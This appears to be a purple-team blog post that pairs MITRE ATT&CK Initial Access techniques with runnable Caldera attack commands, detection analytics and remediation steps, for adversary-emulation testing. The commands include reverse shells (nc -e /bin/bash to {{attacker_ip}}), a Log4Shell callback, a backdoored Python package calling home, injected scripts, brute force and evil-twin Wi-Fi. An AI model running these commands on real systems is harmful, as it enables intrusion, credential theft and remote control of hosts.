What is MITRE ATT&CK Initial Access (TA0001)?

Initial Access is the first tactic in the MITRE ATT&CK framework, covering techniques adversaries use to breach an environment, such as exploiting public-facing applications, phishing, and drive-by compromise.

How can I emulate Initial Access techniques in Caldera?

Create individual abilities for each technique using the provided shell commands, add relevant facts (e.g., target host, attacker IP), group them into an adversary profile under the Initial Access phase, and run an operation to test detections.

Which security logs are most useful for detecting Initial Access?

EDR process telemetry, web-proxy or DNS logs, authentication logs, and SIEM correlations are pivotal for surfacing suspicious activity linked to Initial Access techniques.

What remediation steps help close Initial Access gaps?

Key actions include enforcing MFA, patching public-facing services, hardening browsers, applying network segmentation, and implementing strict device-control policies for removable media.

MITRE ATTACK Initial Access: Hands-On Caldera Test Plan

MITRE ATT&CK Initial Access: Hands-On Caldera Test Plan

Updated on 12 June 2025

This post details every MITRE ATT&CK Initial Access (TA0001) technique, supplying ready-to-run Caldera commands, blue-team detection analytics, and remediation guidance. Use it to verify coverage in your SOC, strengthen EDR, AV, and SIEM rules, and sharpen threat-hunting skills.

External reference: MITRE ATT&CK TA0001. See also CISA’s latest advisories for real-world Initial-Access exploits.

MITRE ATTACK Initial Access: Hands-On Purple Team Test Plan

Initial Access (TA0001) Hands-On Test Plan

Goal: Emulate each Initial Access tactic on a Linux host protected by security tooling, collect telemetry, and tune detections until coverage is complete.

T1659 – Content Injection

Commands

# Transparent MITM that appends a tracking <img>
mitmproxy --mode transparent --listen-host {{iface}} \
          --script 'python:import mitmproxy.http as h; \
                     def response(flow:h.HTTPFlow): \
                         flow.response.text+="<img src=http://{{attacker_ip}}/x>"'

# Scapy one-liner: replace </body> with malicious <script>
sudo python3 - <<'PY'
from scapy.all import *
def inj(p):
  if p.haslayer(Raw) and b'</body>' in p[Raw].load:
    p[Raw].load=p[Raw].load.replace(b'</body>',b'<script src=http://{{attacker_ip}}/p.js></script></body>')
    sendp(p,iface="{{iface}}",verbose=0)
sniff(iface="{{iface}}",filter="tcp port 80",prn=inj,store=0)
PY

# iptables + nfqueue live string replace
iptables -t mangle -A PREROUTING -p tcp --dport 80 -j NFQUEUE --queue-num 9
nfqsed -n 9 -p 's|</head>|<iframe src=http://{{attacker_ip}}></iframe></head>|g'

Description

Injects malicious markup or JavaScript into in-transit web traffic, granting code-execution in the victim browser without redirecting them elsewhere.

Detection Guidance

EDR/AV – flag mitmproxy, scapy, or nfqsed launched by non-root users or spawning shells.
Network/SIEM – duplicate ARP replies, sudden HTTP response-size deltas, or <script src= strings in proxy logs.
Host logs – NETFILTER_CFG audit events indicating live iptables edits.

Remediation Guidance

Mandate TLS + HSTS.
Set strict Content-Security-Policy (CSP) headers.
Use Dynamic ARP Inspection and DHCP-Snooping to block rogue L2 devices.

T1189 – Drive-by Compromise

Commands

# Launch an exploit kit in Docker
docker run -d --name exploitkit -p 8080:80 rodsploit/angler-elk

# Watering-hole payload server
python3 -m http.server 8081 --directory ./payloads

# Reflected XSS injection into vulnerable CMS
curl -X POST -d 'comment=<script src="http://{{attacker_ip}}:8081/a.js"></script>' \
     http://{{target}}/blog?id=1

# Simulated victim browsing
chromium --headless http://{{target}}/compromise.html

Description

The victim merely visits a poisoned site; the browser is exploited and malware downloads transparently.

Detection Guidance

EDR/AV – browser spawning shell, curl, or wget.
Web proxy/DNS – first-seen domain followed immediately by binary download.
SIEM – rule: (category=web AND http_status=200) THEN child_process=cmd.exe within 30 s.

Remediation Guidance

Patch browsers and plug-ins; enable exploit mitigations.
Deploy ad-blocking/anti-tracking lists on secure DNS or SWG.
Use browser isolation for high-risk users.

T1190 – Exploit Public-Facing Application

Commands

# Path traversal probe
curl -k -X POST "https://{{target}}/wp-admin/admin-ajax.php" \
     -F 'action=revslider_show_image&img=../../../../../../etc/passwd'

# Log4Shell callback to a sinkhole
curl -H 'User-Agent: ${jndi:ldap://{{attacker_ip}}/a}' https://{{target}}/login

# SQL Injection enumeration
sqlmap -u "https://{{target}}/search.php?q=test" --batch --current-user

# SSRF request to instance metadata
curl -d 'url=http://169.254.169.254/latest/meta-data/' https://{{target}}/preview

Description

Abuses bugs or misconfigurations in Internet-exposed services to gain foothold.

Detection Guidance

WAF/NGFW – signatures for ../, ${jndi:, or SQL keywords in query strings.
EDR/AV – web-server processes spawning shells or network utilities.
SIEM – HTTP 4xx/5xx spike followed by new outbound connection from server within 30 s.

Remediation Guidance

Virtual-patch via WAF rules.
Run web services with least privilege; restrict outbound traffic.
Automated dependency scanning and rapid patch pipelines.

T1133 – External Remote Services

Commands

# SSH brute force
hydra -V -L users.txt -P passwords.txt ssh://{{target}}

# VPN login using procured credentials
echo '{{password}}' | openconnect --user {{user}} vpn.corp.local --passwd-on-stdin

# Connect to exposed VNC
ncat --ssl {{target}} 5900

# RDP from Linux
xfreerdp /v:{{windows_host}} /u:{{domain}}\{{user}} /p:'{{pass}}'

Description

Leverages legitimate remote-access protocols (VPN, SSH, RDP, VNC) reachable from the Internet.

Detection Guidance

EDR/AV – geo-anomaly on authentication events or unexpected openconnect inside container.
Auth logs – bursts of failures followed by success.
SIEM – rule: successful VPN logon from ASN not in allow-list + (device_type != corporate).

Remediation Guidance

Mandate MFA for all remote services.
Geo-fence or risk-score logins; enforce idle timeouts.
Disable unused protocols at the perimeter.

T1200 – Hardware Additions

Commands

# Emulate USB-Ethernet gadget
modprobe g_ether && ifconfig usb0 192.168.7.2/24 up

# HID keystroke injection file (Rubber Ducky)
echo -e 'GUI r\nSTRING xterm\nENTER\nSTRING nc -e /bin/bash {{attacker_ip}} 4444\nENTER' > ducky.txt

# Unsigned kernel module
insmod /tmp/evil.ko

# Rogue Wi-Fi adapter auto-connect
nmcli connection add type wifi ifname wlan1 con-name rogue ssid RogueAP

Description

Attacker connects or seeds rogue hardware (USB NIC, HID, Wi-Fi dongle) creating covert entry points.

Detection Guidance

EDR/AV – USB insertion, driver install, or unsigned kernel-module load alerts.
Endpoint logs – kernel: new high-speed USB device, audit: MODULE_SIG.
SIEM – NAC sees unknown MAC or rogue wireless BSSID.

Remediation Guidance

Deploy USBGuard or similar device-control policies.
802.1X with certificate auth for wired/wireless.
Disable/lock unused physical ports in sensitive areas.

T1566 – Phishing (Parent & Sub-Techniques)

T1566.001 – Spearphishing Attachment

Commands

swaks --attach paystub_update.doc --header 'Subject: Payroll Action Required' \
      --to {{victim_email}} --from hr@corp.fake

Description

Emails a malicious document to entice execution.

Detection Guidance

Email gateway – macro or weaponised document detection.
EDR/AV – Office process spawning interpreter (python, powershell.exe).
SIEM – correlate email_id → hash → execution on endpoint.

Remediation Guidance

Block/detonate Office macros from untrusted senders.
Enforce SPF, DKIM, DMARC.
Run continual phishing-awareness training.

T1566.002 – Spearphishing Link

Commands

swaks --body "Quick review: https://drive.evil/{{uuid}}" \
      --to {{victim_email}} --from notifications@corp.fake

Description

Email contains malicious hyperlink hosting the payload.

Detection Guidance

URL-rewriting service – scan link before redirect.
EDR/AV – browser download → reputation look-up.
SIEM – DNS query to first-seen domain + HTTP GET > 1 MB.

Remediation Guidance

URL sandboxing and real-time link protection.
Block executable downloads except via approved update servers.
Domain allow-lists for exec leadership.

T1566.003 – Spearphishing via Service

Commands

curl -X POST -H "Authorization: Bearer {{slack_token}}" \
     -d '{"channel":"#general","text":"Urgent! https://tinyurl.com/p0wn"}' \
     https://slack.com/api/chat.postMessage

Description

Phish delivered through a third-party platform (Slack, Teams, GitHub Issues).

Detection Guidance

CASB/SaaS API – suspicious links in corp channels.
EDR/AV – chat app spawning browser or shell.
SIEM – URLs shortened via public shorteners.

Remediation Guidance

API-based DLP/URL scanning on collaboration apps.
Restrict unsanctioned SaaS tokens with Conditional Access.
Awareness training for shadow-IT channels.

T1566.004 – Spearphishing Voice

Commands

twilio api:core:calls:create --from +15551230000 --to {{victim_phone}} \
      --url https://{{attacker_ip}}/vishing.xml

Description

Vishing call attempts to coerce credentials or MFA codes.

Detection Guidance

Voice analytics – short robocalls with spoofed caller-ID.
SIEM – cross-reference CTI feed of vishing numbers with CDRs.
EDR/AV – no direct host signal; monitor identity events.

Remediation Guidance

Call-back verification for sensitive ops.
Number-reputation services; STIR/SHAKEN validation.
Train help-desk on vishing patterns.

T1091 – Replication Through Removable Media

Commands

# Autorun USB payload
printf '[autorun]\nopen=payload.sh' > /mnt/usb/autorun.inf
cp reverse_shell.sh /mnt/usb/payload.sh

# Malicious ISO presented as USB gadget
genisoimage -o bad.iso -b payload.sh /mnt/usb
modprobe g_mass_storage file=$(pwd)/bad.iso

Description

Malware transferred via USB/ISO, executed automatically or via social engineering.

Detection Guidance

EDR/AV – execution from removable drive letter or mount path.
Udev / Windows Event ID 43 – device-insertion events.
SIEM – surge in USB logs, new hashes from /media.

Remediation Guidance

Disable Autorun; enforce signed USB device control.
Block write access to external drives except approved IDs.
Air-gap critical systems; use data diodes.

T1195 – Supply-Chain Compromise

T1195.001 – Compromise Software Dependencies / Dev Tools

Commands

echo 'import os,urllib.request,sys;urllib.request.urlopen("http://{{attacker_ip}}/p")' \
    > backdoor/__init__.py
pip wheel ./backdoor && pip install backdoor-*.whl

Description

Poisoned library inserted into build; downstream hosts import backdoor.

Detection Guidance

EDR/AV – Python package install outside corporate index.
CI/CD logs – SBOM hash delta.
SIEM – developer workstation reaching uncommon PyPI domain.

Remediation Guidance

Enforce signed packages and internal mirrors.
Dependabot/SCA flag unexpected version jumps.
Sandbox builds with runtime scans.

T1195.002 – Compromise Software Supply Chain (Binary Swap)

Commands

cp trojan /srv/repo/app_1.2.3.rpm && createrepo /srv/repo

Description

Trojanised binary replaces legitimate artefact in repository.

Detection Guidance

EDR/AV – code-sign mismatch on install.
Repo logs – unexpected push by stale account.
SIEM – package install where signature ≠ expected thumbprint.

Remediation Guidance

Mandatory signature validation in package managers.
Reproducible builds; deterministic hashing.
Least-privilege CI/CD credentials.

T1195.003 – Compromise Hardware Supply Chain

Commands

ipmitool -I lanplus -H {{bmc_ip}} -U root -P {{bmc_pass}} hpm upgrade rogue.hpm

Description

Flashes malicious firmware to BMC or peripheral before deployment.

Detection Guidance

Endpoint Integrity – secure-boot failure or PCR mismatch.
SIEM – firmware version not on approved list.
Network logs – out-of-band BMC beaconing to unknown IP.

Remediation Guidance

Hardware root-of-trust with measured boot.
Vendor audits and firmware signing policy.
Continuous firmware inventory & drift detection.

T1199 – Trusted Relationship

Commands

# Partner VPN connection
openvpn --config partner.ovpn --auth-user-pass partner.creds

# SSH pivot
ssh -J partner@partner-gw corp@db.internal

# Supplier NFS mount
mount -t nfs4 supplier.example.com:/export /mnt/supplier

Description

Abuses connectivity granted to a supplier, subsidiary, or MSP.

Detection Guidance

Zero-Trust logs – cross-tenant session via external IdP.
EDR/AV – new SSH tunnel on VPN interface.
SIEM – partner IP ranges accessing sensitive VLANs.

Remediation Guidance

Segmentation with policy-based access.
Regular credential rotation for third parties.
Continuous trust evaluation clauses in contracts.

T1078 – Valid Accounts

T1078.001 – Default Accounts

Commands

ssh root@{{target}}  # default credentials in defaults.txt

Description

Leverages vendor default usernames/passwords.

Detection Guidance

Auth logs – root logins outside maintenance window.
EDR/AV – high-privilege account on non-standard host.
SIEM – user=root AND src_ip NOT IN maintenance_jump_boxes.

Remediation Guidance

Rotate passwords at build.
Disable direct root SSH.
Compliance scanning for defaults.

T1078.002 – Domain Accounts

Commands

winexe -U "ORG\\svc:{{pass}}" //{{dc}} cmd /c whoami

Description

Uses service or user accounts that already exist in the domain.

Detection Guidance

EDR/AV – unusual host for service-account logon.
SIEM – Kerberos TGT issued on workstation OU, not server OU.

Remediation Guidance

Tiered admin model.
LAPS/secrets rotation for service accounts.
Conditional Access enforcing device compliance.

T1078.003 – Local Accounts

Commands

ssh backup@{{target}}   # shared local password

Description

Access via local user with identical credentials across machines.

Detection Guidance

Auditd – local user login from different TTY range.
EDR/AV – reused password hash across fleet.
SIEM – logons user=backup on > 5 hosts/hour.

Remediation Guidance

Eliminate shared locals; enforce central identity.
Require sudo with MFA.
Baseline: one-host-one-password.

T1078.004 – Cloud Accounts

Commands

aws s3 ls --profile stolen

Description

Uses compromised IAM keys or cloud console credentials.

Detection Guidance

Cloud logs – console login from new ASN, MFAUsed=false.
EDR/AV – aws CLI executed from non-developer workstation.
SIEM – GuardDuty “CredentialAccess” findings.

Remediation Guidance

Enforce MFA & short-lived tokens.
Plant canary credentials to detect copying.
Apply least-privilege IAM and SCPs.

T1669 – Wi-Fi Networks

Commands

# Rogue AP
hostapd -B rogue.conf && dhcpd -cf dhcpd.conf wlan0

# Capture WPA handshake
airodump-ng -c 6 --bssid {{target_bssid}} -w cap wlan0
aircrack-ng cap-01.cap -w rockyou.txt

# Evil-twin captive portal
wifiphisher --essid "{{corp_wifi}}" --logging -p oauth-login

# Connect to open guest SSID
nmcli d wifi connect {{open_ssid}}

Description

Exploits insecure or rogue wireless networks to gain entry or harvest credentials.

Detection Guidance

Wireless IDS – rogue ESSID/BSSID, de-auth floods.
EDR/AV – new wireless profile added on endpoint.
SIEM – DHCP lease from unknown AP then internal traffic.

Remediation Guidance

802.1X EAP-TLS for all corp Wi-Fi.
WIDS with automatic containment.
Segregate or disable guest SSIDs; rotate PSKs often.

Running the Plan in Caldera

Define abilities – each command as a separate ability (executor: sh, platform: linux).
Insert facts – e.g., target, attacker_ip, iface, victim_email.
Bundle into an adversary profile under the Initial Access phase.
Launch operation on a test host with your EDR/AV and logging stack active.
Validate detections, adjust analytic rules, and rerun until every technique fires the intended alert.

Happy purple-teaming—may every exploit be loud and every defender faster than the log scroll!

MITRE ATT&CK, Initial Access, TA0001, Caldera, Adversary Emulation, SOC, Purple Team